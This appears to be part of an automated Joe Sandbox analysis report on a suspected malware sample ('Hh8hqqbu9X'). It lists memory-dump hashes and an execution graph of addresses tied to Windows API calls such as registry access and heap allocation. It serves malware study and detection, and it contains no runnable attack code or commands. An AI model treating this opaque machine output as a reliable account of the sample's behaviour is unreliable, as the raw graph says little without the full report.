                                    • Source File: 00000000.00000002.2119917897.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5900000_Hh8hqqbu9X.jbxd
                                    Similarity
                                    • API ID: CloseHandle
                                    • String ID:
                                    • API String ID: 2962429428-0
                                    • Opcode ID: 56fb6d42eef30752a7da274749cf2924bd46b4e6098e4640bba3a5d3866f25f9
                                    • Instruction ID: 3d965d376cd6c58fdd8546309212295911055878b7c72be5a6b20f0bd5540422
                                    • Opcode Fuzzy Hash: 56fb6d42eef30752a7da274749cf2924bd46b4e6098e4640bba3a5d3866f25f9
                                    • Instruction Fuzzy Hash: 091113B1900349CFCB20DF99D449BAEBBF4EB48320F11885AD959A7341D338A944CFA5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2118274077.00000000017CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017CD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_17cd000_Hh8hqqbu9X.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d664db3c7fee77aad42419e4d05b5bacdd584ce75caa24fa243b673edcf2a1b5
                                    • Instruction ID: 07a7736c0174a03185c439d8b83e99db9b82e62b3198980e39bab1ab8d8ee783
                                    • Opcode Fuzzy Hash: d664db3c7fee77aad42419e4d05b5bacdd584ce75caa24fa243b673edcf2a1b5
                                    • Instruction Fuzzy Hash: 042102B1500200DFDB11DF88D9C0B66FB65EB84714F24C5ADDE090A246C336E416C6A1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2118319487.00000000017DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017DD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_17dd000_Hh8hqqbu9X.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c4f9dee4f835351f2183e5e013240fecef48505d8a2eba7ffb31afcbb6cecc8e
                                    • Instruction ID: 5cfc824c628db4d3b76d5c508e5af6ce1353b4b31f1bd15b6deec59f33c06ec0
                                    • Opcode Fuzzy Hash: c4f9dee4f835351f2183e5e013240fecef48505d8a2eba7ffb31afcbb6cecc8e
                                    • Instruction Fuzzy Hash: 2521D3B1604248DFDB25DF58D9C4B16FB75EBC8354F24C5ADD90A4B286C336D407CA61
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2118319487.00000000017DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017DD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_17dd000_Hh8hqqbu9X.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a2ec0b234a0803e0bd8fea66483080409c28852b3ec232d0a05eabceea81fad0
                                    • Instruction ID: e74826c0d958dcbfcd6e65dd3e5e70724fd6b4b3c97fd08f1dec3751dff91944
                                    • Opcode Fuzzy Hash: a2ec0b234a0803e0bd8fea66483080409c28852b3ec232d0a05eabceea81fad0
                                    • Instruction Fuzzy Hash: 7C2192755083849FCB13CF64D994715BF71EB86214F28C5EAD8498F2A7C33AD81ACB62
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2118274077.00000000017CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017CD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_17cd000_Hh8hqqbu9X.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                                    • Instruction ID: 4217160998ac0adc8f64805ff7f7532f9ade9be901d72c215c57651b64af86e5
                                    • Opcode Fuzzy Hash: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                                    • Instruction Fuzzy Hash: B311CA72404280DFDB12CF44D9C4B56FF62FB84324F24C2ADDE090A656C33AE55ACBA2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2119848113.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_58a0000_Hh8hqqbu9X.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f6d96f80d0aadb3c040418c16cc5b17eff335c6d39e7e4360820a01ce24599b6
                                    • Instruction ID: 76c64768f9aabc5de28525456c3a9dac71b79b46829e452bb31ad767b26b75a1
                                    • Opcode Fuzzy Hash: f6d96f80d0aadb3c040418c16cc5b17eff335c6d39e7e4360820a01ce24599b6
                                    • Instruction Fuzzy Hash: CD1285F05017858AE732CF65E95C1893BB1BB85318F58432AD2612F6E9DBB8174BCF84
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2118448425.0000000001820000.00000040.00000800.00020000.00000000.sdmp, Offset: 01820000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_1820000_Hh8hqqbu9X.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b16726e0a2a97531c3efb58d1dca22ae6ce4ba57bf2020892ef2f7605080e07d
                                    • Instruction ID: 2fec19dbac71b6f88fabe01f49936fac2b009a43605ae4f9ba6c40bdc1f2f759
                                    • Opcode Fuzzy Hash: b16726e0a2a97531c3efb58d1dca22ae6ce4ba57bf2020892ef2f7605080e07d
                                    • Instruction Fuzzy Hash: B7A18236E00225CFCF16DFB9D54099EBBB2FF85300B15856AEA01EB225DB35DA45CB40
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2119848113.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_58a0000_Hh8hqqbu9X.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 71ebd10f1e9094d8a594606c5bd66fe9409f9a14d0153fad8503d4ac59009af7
                                    • Instruction ID: bb429df0fb3def28e32d63f1029922832b80ab50dba60d46522f6f9323568a23
                                    • Opcode Fuzzy Hash: 71ebd10f1e9094d8a594606c5bd66fe9409f9a14d0153fad8503d4ac59009af7
                                    • Instruction Fuzzy Hash: 75C1F8B05017868FD732CF64E9481897BB1BB85328F59432BD1616F2E9DBB8164BCF44

                                    Execution Graph

                                    Execution Coverage:31.5%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:4.4%
                                    Total number of Nodes:1846
                                    Total number of Limit Nodes:92
                                    execution_graph 9702 40c640 9729 404bee 9702->9729 9705 40c70f 9706 404bee 6 API calls 9707 40c66b 9706->9707 9708 404bee 6 API calls 9707->9708 9713 40c708 9707->9713 9710 40c683 9708->9710 9709 402bab 2 API calls 9709->9705 9711 404bee 6 API calls 9710->9711 9717 40c701 9710->9717 9716 40c694 9711->9716 9712 402bab 2 API calls 9712->9713 9713->9709 9714 40c6f8 9715 402bab 2 API calls 9714->9715 9715->9717 9716->9714 9736 40c522 9716->9736 9717->9712 9719 40c6a9 9720 40c6ef 9719->9720 9722 405872 4 API calls 9719->9722 9721 402bab 2 API calls 9720->9721 9721->9714 9723 40c6c5 9722->9723 9724 405872 4 API calls 9723->9724 9725 40c6d5 9724->9725 9726 405872 4 API calls 9725->9726 9727 40c6e7 9726->9727 9728 402bab 2 API calls 9727->9728 9728->9720 9730 402b7c 2 API calls 9729->9730 9731 404bff 9730->9731 9732 4031e5 4 API calls 9731->9732 9735 404c3b 9731->9735 9733 404c28 9732->9733 9734 402bab 2 API calls 9733->9734 9733->9735 9734->9735 9735->9705 9735->9706 9737 402b7c 2 API calls 9736->9737 9738 40c542 9737->9738 9738->9719 9739 405941 9740 4031e5 4 API calls 9739->9740 9741 405954 9740->9741 8306 409046 8319 413b28 8306->8319 8308 40906d 8310 405b6f 6 API calls 8308->8310 8309 40904e 8309->8308 8311 403fbf 7 API calls 8309->8311 8312 40907c 8310->8312 8311->8308 8313 409092 8312->8313 8323 409408 8312->8323 8315 4090a3 8313->8315 8318 402bab 2 API calls 8313->8318 8317 402bab 2 API calls 8317->8313 8318->8315 8320 413b31 8319->8320 8321 413b38 8319->8321 8322 404056 6 API calls 8320->8322 8321->8309 8322->8321 8324 409413 8323->8324 8325 40908c 8324->8325 8337 409d36 8324->8337 8325->8317 8336 40945c 8443 40a35d 8336->8443 8338 409d43 8337->8338 8339 40a35d 4 API calls 8338->8339 8340 409d55 8339->8340 8341 4031e5 4 API calls 8340->8341 8342 409d8b 8341->8342 8343 4031e5 4 API calls 8342->8343 8344 409dd0 8343->8344 8345 405b6f 6 API calls 8344->8345 8376 409423 8344->8376 8348 409df7 8345->8348 8346 409e1c 8347 4031e5 4 API calls 8346->8347 8346->8376 8349 409e62 8347->8349 8348->8346 8350 402bab 2 API calls 8348->8350 8351 4031e5 4 API calls 8349->8351 8350->8346 8352 409e82 8351->8352 8353 4031e5 4 API calls 8352->8353 8354 409ea2 8353->8354 8355 4031e5 4 API calls 8354->8355 8356 409ec2 8355->8356 8357 4031e5 4 API calls 8356->8357 8358 409ee2 8357->8358 8359 4031e5 4 API calls 8358->8359 8360 409f02 8359->8360 8361 4031e5 4 API calls 8360->8361 8362 409f22 8361->8362 8363 4031e5 4 API calls 8362->8363 8366 409f42 8363->8366 8364 40a19b 8365 408b2c 4 API calls 8364->8365 8365->8376 8366->8364 8367 409fa3 8366->8367 8368 405b6f 6 API calls 8367->8368 8367->8376 8369 409fbd 8368->8369 8370 40a02c 8369->8370 8371 402bab 2 API calls 8369->8371 8372 4031e5 4 API calls 8370->8372 8398 40a16d 8370->8398 8374 409fd7 8371->8374 8375 40a070 8372->8375 8373 402bab 2 API calls 8373->8376 8377 405b6f 6 API calls 8374->8377 8378 4031e5 4 API calls 8375->8378 8376->8336 8399 4056bf 8376->8399 8380 409fe5 8377->8380 8379 40a090 8378->8379 8381 4031e5 4 API calls 8379->8381 8380->8370 8382 402bab 2 API calls 8380->8382 8383 40a0b0 8381->8383 8384 409fff 8382->8384 8387 4031e5 4 API calls 8383->8387 8385 405b6f 6 API calls 8384->8385 8386 40a00d 8385->8386 8386->8370 8389 40a021 8386->8389 8388 40a0d0 8387->8388 8391 4031e5 4 API calls 8388->8391 8390 402bab 2 API calls 8389->8390 8390->8376 8392 40a0f0 8391->8392 8393 4031e5 4 API calls 8392->8393 8394 40a110 8393->8394 8395 4031e5 4 API calls 8394->8395 8396 40a134 8394->8396 8395->8396 8396->8398 8453 408b2c 8396->8453 8398->8373 8398->8376 8400 402b7c 2 API calls 8399->8400 8402 4056cd 8400->8402 8401 4056d4 8404 408c4d 8401->8404 8402->8401 8403 402b7c 2 API calls 8402->8403 8403->8401 8405 413ba4 6 API calls 8404->8405 8406 408c5c 8405->8406 8407 408f02 8406->8407 8408 408f3a 8406->8408 8411 40903e 8406->8411 8410 405b6f 6 API calls 8407->8410 8409 405b6f 6 API calls 8408->8409 8425 408f51 8409->8425 8412 408f0c 8410->8412 8427 413aca 8411->8427 8412->8411 8416 408f31 8412->8416 8456 40a1b6 8412->8456 8414 405b6f 6 API calls 8414->8425 8415 402bab 2 API calls 8415->8411 8416->8415 8418 409031 8419 402bab 2 API calls 8418->8419 8419->8416 8420 409022 8421 402bab 2 API calls 8420->8421 8422 409028 8421->8422 8423 402bab 2 API calls 8422->8423 8423->8416 8424 402bab GetProcessHeap HeapFree 8424->8425 8425->8411 8425->8414 8425->8416 8425->8418 8425->8420 8425->8424 8426 40a1b6 14 API calls 8425->8426 8490 4044ee 8425->8490 8426->8425 8428 409451 8427->8428 8429 413ad7 8427->8429 8437 405695 8428->8437 8430 405781 4 API calls 8429->8430 8431 413af0 8430->8431 8432 405781 4 API calls 8431->8432 8433 413afe 8432->8433 8434 405762 4 API calls 8433->8434 8435 413b0e 8434->8435 8435->8428 8436 405781 4 API calls 8435->8436 8436->8428 8438 4056a0 8437->8438 8439 4056b9 8437->8439 8440 402bab 2 API calls 8438->8440 8439->8336 8441 4056b3 8440->8441 8442 402bab 2 API calls 8441->8442 8442->8439 8444 40a39a 8443->8444 8448 40a368 8443->8448 8445 4031e5 4 API calls 8444->8445 8447 40a3af 8444->8447 8445->8447 8446 40a3ca 8450 40a38a 8446->8450 8452 408b2c 4 API calls 8446->8452 8447->8446 8449 408b2c 4 API calls 8447->8449 8451 4031e5 4 API calls 8448->8451 8449->8446 8450->8325 8451->8450 8452->8450 8454 4031e5 4 API calls 8453->8454 8455 408b3e 8454->8455 8455->8398 8457 40a202 8456->8457 8458 40a1c3 8456->8458 8612 405f08 8457->8612 8460 405b6f 6 API calls 8458->8460 8462 40a1d0 8460->8462 8461 40a1fc 8461->8416 8462->8461 8463 40a1f3 8462->8463 8500 40a45b 8462->8500 8468 402bab 2 API calls 8463->8468 8465 40a333 8467 402bab 2 API calls 8465->8467 8467->8461 8468->8461 8469 405b6f 6 API calls 8471 40a245 8469->8471 8470 40a25d 8472 405b6f 6 API calls 8470->8472 8471->8470 8473 413a58 13 API calls 8471->8473 8478 40a26b 8472->8478 8474 40a257 8473->8474 8477 402bab 2 API calls 8474->8477 8475 40a28b 8476 405b6f 6 API calls 8475->8476 8484 40a297 8476->8484 8477->8470 8478->8475 8479 40a284 8478->8479 8619 40955b 8478->8619 8482 402bab 2 API calls 8479->8482 8480 40a2b7 8480->8465 8483 405b6f 6 API calls 8480->8483 8489 402bab 2 API calls 8480->8489 8636 4098a7 8480->8636 8482->8475 8483->8480 8484->8480 8485 40a2b0 8484->8485 8626 40968e 8484->8626 8486 402bab 2 API calls 8485->8486 8486->8480 8489->8480 8491 402b7c 2 API calls 8490->8491 8492 404512 8491->8492 8494 404585 GetLastError 8492->8494 8495 402bab 2 API calls 8492->8495 8498 402b7c 2 API calls 8492->8498 8499 40457c 8492->8499 8891 4044a7 8492->8891 8496 404592 8494->8496 8494->8499 8495->8492 8497 402bab 2 API calls 8496->8497 8497->8499 8498->8492 8499->8425 8645 40642c 8500->8645 8502 40a469 8503 40c4ff 8502->8503 8648 4047e6 8502->8648 8503->8463 8506 4040bb 12 API calls 8507 40bf88 8506->8507 8507->8503 8508 403c90 8 API calls 8507->8508 8509 40bfaa 8508->8509 8510 402b7c 2 API calls 8509->8510 8512 40bfc1 8510->8512 8511 40c4f3 8513 403f9e 5 API calls 8511->8513 8514 40c3aa 8512->8514 8655 40a423 8512->8655 8513->8503 8514->8511 8517 4056bf 2 API calls 8514->8517 8520 40c4e3 8514->8520 8515 402bab 2 API calls 8515->8511 8519 40c3d2 8517->8519 8519->8520 8522 4040bb 12 API calls 8519->8522 8520->8515 8521 405f08 4 API calls 8523 40c005 8521->8523 8524 40c3f3 8522->8524 8525 40c021 8523->8525 8658 40a43f 8523->8658 8527 40c4d1 8524->8527 8715 405a52 8524->8715 8526 4031e5 4 API calls 8525->8526 8529 40c034 8526->8529 8532 413aca 4 API calls 8527->8532 8538 4031e5 4 API calls 8529->8538 8533 40c4dd 8532->8533 8536 405695 2 API calls 8533->8536 8534 40c411 8720 405a87 8534->8720 8535 402bab 2 API calls 8535->8525 8536->8520 8544 40c04d 8538->8544 8539 40c4b3 8540 402bab 2 API calls 8539->8540 8542 40c4cb 8540->8542 8541 405a52 4 API calls 8552 40c423 8541->8552 8543 403f9e 5 API calls 8542->8543 8543->8527 8546 4031e5 4 API calls 8544->8546 8545 405a87 4 API calls 8545->8552 8547 40c085 8546->8547 8549 4031e5 4 API calls 8547->8549 8548 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8548->8552 8550 40c09c 8549->8550 8553 4031e5 4 API calls 8550->8553 8551 402bab 2 API calls 8551->8552 8552->8539 8552->8541 8552->8545 8552->8548 8552->8551 8554 40c0b3 8553->8554 8555 4031e5 4 API calls 8554->8555 8556 40c0ca 8555->8556 8557 4031e5 4 API calls 8556->8557 8558 40c0e7 8557->8558 8559 4031e5 4 API calls 8558->8559 8560 40c100 8559->8560 8561 4031e5 4 API calls 8560->8561 8562 40c119 8561->8562 8563 4031e5 4 API calls 8562->8563 8564 40c132 8563->8564 8565 4031e5 4 API calls 8564->8565 8566 40c14b 8565->8566 8567 4031e5 4 API calls 8566->8567 8568 40c164 8567->8568 8569 4031e5 4 API calls 8568->8569 8570 40c17d 8569->8570 8571 4031e5 4 API calls 8570->8571 8572 40c196 8571->8572 8573 4031e5 4 API calls 8572->8573 8574 40c1af 8573->8574 8575 4031e5 4 API calls 8574->8575 8576 40c1c8 8575->8576 8577 4031e5 4 API calls 8576->8577 8578 40c1de 8577->8578 8579 4031e5 4 API calls 8578->8579 8580 40c1f4 8579->8580 8581 4031e5 4 API calls 8580->8581 8582 40c20d 8581->8582 8583 4031e5 4 API calls 8582->8583 8584 40c226 8583->8584 8585 4031e5 4 API calls 8584->8585 8586 40c23f 8585->8586 8587 4031e5 4 API calls 8586->8587 8588 40c258 8587->8588 8589 4031e5 4 API calls 8588->8589 8590 40c273 8589->8590 8591 4031e5 4 API calls 8590->8591 8592 40c28a 8591->8592 8593 4031e5 4 API calls 8592->8593 8596 40c2d5 8593->8596 8594 40c3a2 8595 402bab 2 API calls 8594->8595 8595->8514 8596->8594 8597 4031e5 4 API calls 8596->8597 8598 40c315 8597->8598 8599 40c38b 8598->8599 8661 404866 8598->8661 8600 403c40 5 API calls 8599->8600 8602 40c397 8600->8602 8604 403c40 5 API calls 8602->8604 8604->8594 8605 40c382 8607 403c40 5 API calls 8605->8607 8607->8599 8609 406c4c 6 API calls 8610 40c355 8609->8610 8610->8605 8685 4126a7 8610->8685 8613 4031e5 4 API calls 8612->8613 8614 405f1d 8613->8614 8615 405f55 8614->8615 8616 402b7c 2 API calls 8614->8616 8615->8461 8615->8465 8615->8469 8615->8470 8617 405f36 8616->8617 8617->8615 8618 4031e5 4 API calls 8617->8618 8618->8615 8620 409673 8619->8620 8625 40956d 8619->8625 8620->8479 8621 408b45 6 API calls 8621->8625 8622 4059d8 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 8622->8625 8623 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8623->8625 8624 402bab GetProcessHeap HeapFree 8624->8625 8625->8620 8625->8621 8625->8622 8625->8623 8625->8624 8627 4040bb 12 API calls 8626->8627 8634 4096a9 8627->8634 8628 40989f 8628->8485 8629 409896 8630 403f9e 5 API calls 8629->8630 8630->8628 8632 408b45 6 API calls 8632->8634 8633 402bab GetProcessHeap HeapFree 8633->8634 8634->8628 8634->8629 8634->8632 8634->8633 8635 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8634->8635 8884 4059d8 8634->8884 8635->8634 8637 4040bb 12 API calls 8636->8637 8644 4098c1 8637->8644 8638 4099fb 8638->8480 8639 4099f3 8640 403f9e 5 API calls 8639->8640 8640->8638 8641 402bab GetProcessHeap HeapFree 8641->8644 8642 4059d8 4 API calls 8642->8644 8643 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8643->8644 8644->8638 8644->8639 8644->8641 8644->8642 8644->8643 8646 4031e5 4 API calls 8645->8646 8647 406441 GetNativeSystemInfo 8646->8647 8647->8502 8649 4031e5 4 API calls 8648->8649 8652 40480a 8649->8652 8650 40485d 8650->8503 8650->8506 8651 4031e5 4 API calls 8651->8652 8652->8650 8652->8651 8653 40484f 8652->8653 8654 403c40 5 API calls 8653->8654 8654->8650 8656 4031e5 4 API calls 8655->8656 8657 40a435 8656->8657 8657->8521 8659 4031e5 4 API calls 8658->8659 8660 40a451 8659->8660 8660->8535 8662 4031e5 4 API calls 8661->8662 8663 40487c 8662->8663 8663->8605 8664 406c4c 8663->8664 8725 4068eb 8664->8725 8666 406e02 8666->8609 8667 406cab 8737 40469b 8667->8737 8668 406c6c 8668->8666 8668->8667 8734 406894 8668->8734 8675 406df1 8676 40469b 4 API calls 8675->8676 8676->8666 8677 406cef 8677->8675 8678 4031e5 4 API calls 8677->8678 8679 406d26 8678->8679 8679->8675 8680 40771e 6 API calls 8679->8680 8684 406d57 8680->8684 8681 406da2 8682 4031e5 4 API calls 8681->8682 8682->8675 8684->8681 8750 4068b0 8684->8750 8686 4126bb 8685->8686 8687 4126d1 8685->8687 8689 412840 8686->8689 8806 40488c 8686->8806 8687->8689 8812 407055 8687->8812 8689->8605 8692 412837 8694 403c40 5 API calls 8692->8694 8694->8689 8696 41281e 8697 4070ff 6 API calls 8696->8697 8697->8692 8698 407055 6 API calls 8699 412742 8698->8699 8699->8696 8700 40719a 6 API calls 8699->8700 8701 41276e 8700->8701 8702 412804 8701->8702 8828 406f4a 8701->8828 8856 4070ff 8702->8856 8705 41279a 8834 412553 8705->8834 8878 405907 8715->8878 8717 405a61 8718 405a76 8717->8718 8719 405907 4 API calls 8717->8719 8718->8534 8719->8717 8721 402b7c 2 API calls 8720->8721 8722 405a99 8721->8722 8724 405ade 8722->8724 8881 40595e 8722->8881 8724->8552 8753 4076a8 8725->8753 8727 406913 8728 406a61 8727->8728 8729 40771e 6 API calls 8727->8729 8728->8668 8730 406949 8729->8730 8730->8728 8731 40771e 6 API calls 8730->8731 8732 404678 4 API calls 8730->8732 8759 4046c2 8730->8759 8731->8730 8732->8730 8735 4031e5 4 API calls 8734->8735 8736 4068a6 8735->8736 8736->8668 8738 4046b4 8737->8738 8739 4046a4 8737->8739 8738->8666 8741 404678 8738->8741 8740 4031e5 4 API calls 8739->8740 8740->8738 8742 4031e5 4 API calls 8741->8742 8743 40468b 8742->8743 8743->8666 8744 40771e 8743->8744 8745 407737 8744->8745 8749 407748 8744->8749 8746 407644 6 API calls 8745->8746 8747 407741 8746->8747 8748 406baa 6 API calls 8747->8748 8748->8749 8749->8677 8751 4031e5 4 API calls 8750->8751 8752 4068c2 8751->8752 8752->8684 8754 4076c1 8753->8754 8755 4076d2 8753->8755 8767 407644 8754->8767 8755->8727 8760 4046d3 8759->8760 8761 4046d9 8759->8761 8802 40464c 8760->8802 8763 404678 4 API calls 8761->8763 8766 4046e9 8761->8766 8763->8766 8764 404714 8764->8730 8765 40469b 4 API calls 8765->8764 8766->8764 8766->8765 8768 407653 8767->8768 8769 407661 8767->8769 8768->8769 8775 406a6b 8768->8775 8771 406baa 8769->8771 8772 406bbb 8771->8772 8774 406bc8 8771->8774 8772->8774 8783 407402 8772->8783 8774->8755 8779 406a81 8775->8779 8776 402b7c 2 API calls 8776->8779 8777 406b8b 8777->8769 8778 406894 4 API calls 8778->8779 8779->8776 8779->8777 8779->8778 8780 406b96 8779->8780 8781 402bab 2 API calls 8779->8781 8782 402bab 2 API calls 8780->8782 8781->8779 8782->8777 8784 407644 6 API calls 8783->8784 8785 407412 8784->8785 8786 402b7c 2 API calls 8785->8786 8793 407450 8785->8793 8787 407483 8786->8787 8788 402b7c 2 API calls 8787->8788 8787->8793 8790 4074ce 8788->8790 8789 4074da 8791 4068cc 2 API calls 8789->8791 8790->8789 8792 402b7c 2 API calls 8790->8792 8791->8793 8796 40751f 8792->8796 8793->8774 8794 40752b 8795 4068cc 2 API calls 8794->8795 8795->8789 8796->8794 8798 4068cc 8796->8798 8799 4068d6 8798->8799 8800 4068e3 8798->8800 8799->8800 8801 402bab GetProcessHeap HeapFree 8799->8801 8800->8794 8801->8800 8803 404666 8802->8803 8804 404659 8802->8804 8803->8761 8805 4031e5 4 API calls 8804->8805 8805->8803 8807 4047e6 5 API calls 8806->8807 8808 404897 8807->8808 8809 40489c 8808->8809 8864 4047c7 8808->8864 8809->8687 8813 40706f 8812->8813 8814 407084 8812->8814 8813->8814 8815 407644 6 API calls 8813->8815 8819 4070e4 8814->8819 8867 406fd2 8814->8867 8816 40707d 8815->8816 8818 406baa 6 API calls 8816->8818 8818->8814 8819->8692 8820 40719a 8819->8820 8821 4071b0 8820->8821 8825 4071c5 8820->8825 8822 407644 6 API calls 8821->8822 8821->8825 8823 4071be 8822->8823 8824 406baa 6 API calls 8823->8824 8824->8825 8826 406fd2 4 API calls 8825->8826 8827 407226 8825->8827 8826->8827 8827->8696 8827->8698 8829 406f64 8828->8829 8833 406f75 8828->8833 8830 407644 6 API calls 8829->8830 8831 406f6e 8830->8831 8832 406baa 6 API calls 8831->8832 8832->8833 8833->8705 8875 4060ac 8834->8875 8857 407116 8856->8857 8858 40712b 8856->8858 8857->8858 8859 407644 6 API calls 8857->8859 8861 406fd2 4 API calls 8858->8861 8863 407187 8858->8863 8860 407124 8859->8860 8862 406baa 6 API calls 8860->8862 8861->8863 8862->8858 8863->8696 8865 4031e5 4 API calls 8864->8865 8866 4047d9 8865->8866 8866->8687 8868 406fde 8867->8868 8869 407027 8868->8869 8870 4031e5 4 API calls 8868->8870 8869->8819 8871 406ffa 8870->8871 8872 4031e5 4 API calls 8871->8872 8873 407011 8872->8873 8874 4031e5 4 API calls 8873->8874 8874->8869 8876 4031e5 4 API calls 8875->8876 8877 4060bb 8876->8877 8877->8877 8879 4031e5 4 API calls 8878->8879 8880 40591a 8879->8880 8880->8717 8882 4031e5 4 API calls 8881->8882 8883 405971 8882->8883 8883->8722 8885 4031e5 4 API calls 8884->8885 8886 4059ed 8885->8886 8887 402b7c 2 API calls 8886->8887 8890 405a38 8886->8890 8888 405a16 8887->8888 8889 4031e5 4 API calls 8888->8889 8888->8890 8889->8890 8890->8634 8892 4031e5 4 API calls 8891->8892 8893 4044b9 8892->8893 8893->8492 9813 40a349 9814 4098a7 13 API calls 9813->9814 9815 40a359 9814->9815 9052 408952 9073 40823f 9052->9073 9055 408960 9057 4056bf 2 API calls 9055->9057 9058 40896a 9057->9058 9101 408862 9058->9101 9060 413aca 4 API calls 9061 4089d4 9060->9061 9063 405695 2 API calls 9061->9063 9062 408975 9070 4089c4 9062->9070 9109 4087d6 9062->9109 9065 4089df 9063->9065 9070->9060 9071 402bab 2 API calls 9072 40899d 9071->9072 9072->9070 9072->9071 9074 40824d 9073->9074 9075 40831b 9074->9075 9076 4031e5 4 API calls 9074->9076 9075->9055 9089 4083bb 9075->9089 9077 40826d 9076->9077 9078 4031e5 4 API calls 9077->9078 9079 408289 9078->9079 9080 4031e5 4 API calls 9079->9080 9081 4082a5 9080->9081 9082 4031e5 4 API calls 9081->9082 9083 4082c1 9082->9083 9084 4031e5 4 API calls 9083->9084 9085 4082e2 9084->9085 9086 4031e5 4 API calls 9085->9086 9087 4082ff 9086->9087 9088 4031e5 4 API calls 9087->9088 9088->9075 9137 408363 9089->9137 9092 4056bf 2 API calls 9098 4083f4 9092->9098 9093 413aca 4 API calls 9094 4084a0 9093->9094 9095 405695 2 API calls 9094->9095 9096 4084ab 9095->9096 9096->9055 9097 408492 9097->9093 9098->9097 9140 40815d 9098->9140 9155 40805d 9098->9155 9170 404b8f 9101->9170 9103 408946 9103->9062 9104 40887e 9104->9103 9105 4031e5 4 API calls 9104->9105 9106 40893e 9104->9106 9108 402b7c 2 API calls 9104->9108 9105->9104 9173 404a39 9106->9173 9108->9104 9110 402b7c 2 API calls 9109->9110 9111 4087e7 9110->9111 9112 4031e5 4 API calls 9111->9112 9117 40885a 9111->9117 9115 408802 9112->9115 9113 408853 9114 402bab 2 API calls 9113->9114 9114->9117 9115->9113 9118 40884d 9115->9118 9182 408522 9115->9182 9186 4084b4 9115->9186 9121 408749 9117->9121 9189 4084d4 9118->9189 9122 404b8f 5 API calls 9121->9122 9127 408765 9122->9127 9123 4087cf 9129 4085d1 9123->9129 9124 4031e5 4 API calls 9124->9127 9125 408522 4 API calls 9125->9127 9126 4087c7 9128 404a39 5 API calls 9126->9128 9127->9123 9127->9124 9127->9125 9127->9126 9128->9123 9130 4086c2 9129->9130 9131 4085e9 9129->9131 9130->9072 9131->9130 9133 402bab 2 API calls 9131->9133 9134 4031e5 4 API calls 9131->9134 9195 4089e6 9131->9195 9214 4086c9 9131->9214 9218 4036a3 9131->9218 9133->9131 9134->9131 9138 4031e5 4 API calls 9137->9138 9139 408386 9138->9139 9139->9092 9139->9096 9141 40816f 9140->9141 9142 4081b6 9141->9142 9143 4081fd 9141->9143 9154 4081ef 9141->9154 9145 405872 4 API calls 9142->9145 9144 405872 4 API calls 9143->9144 9146 408213 9144->9146 9147 4081cf 9145->9147 9148 405872 4 API calls 9146->9148 9149 405872 4 API calls 9147->9149 9151 408222 9148->9151 9150 4081df 9149->9150 9152 405872 4 API calls 9150->9152 9153 405872 4 API calls 9151->9153 9152->9154 9153->9154 9154->9098 9156 40808c 9155->9156 9157 4080d2 9156->9157 9158 408119 9156->9158 9169 40810b 9156->9169 9160 405872 4 API calls 9157->9160 9159 405872 4 API calls 9158->9159 9161 40812f 9159->9161 9162 4080eb 9160->9162 9164 405872 4 API calls 9161->9164 9163 405872 4 API calls 9162->9163 9165 4080fb 9163->9165 9166 40813e 9164->9166 9167 405872 4 API calls 9165->9167 9168 405872 4 API calls 9166->9168 9167->9169 9168->9169 9169->9098 9176 404a19 9170->9176 9172 404ba0 9172->9104 9179 4049ff 9173->9179 9175 404a44 9175->9103 9177 4031e5 4 API calls 9176->9177 9178 404a2c RegOpenKeyW 9177->9178 9178->9172 9180 4031e5 4 API calls 9179->9180 9181 404a12 RegCloseKey 9180->9181 9181->9175 9184 408534 9182->9184 9183 4085af 9183->9115 9184->9183 9192 4084ee 9184->9192 9187 4031e5 4 API calls 9186->9187 9188 4084c7 9187->9188 9188->9115 9190 4031e5 4 API calls 9189->9190 9191 4084e7 9190->9191 9191->9113 9193 4031e5 4 API calls 9192->9193 9194 408501 9193->9194 9194->9183 9196 4031e5 4 API calls 9195->9196 9197 408a06 9196->9197 9198 408b21 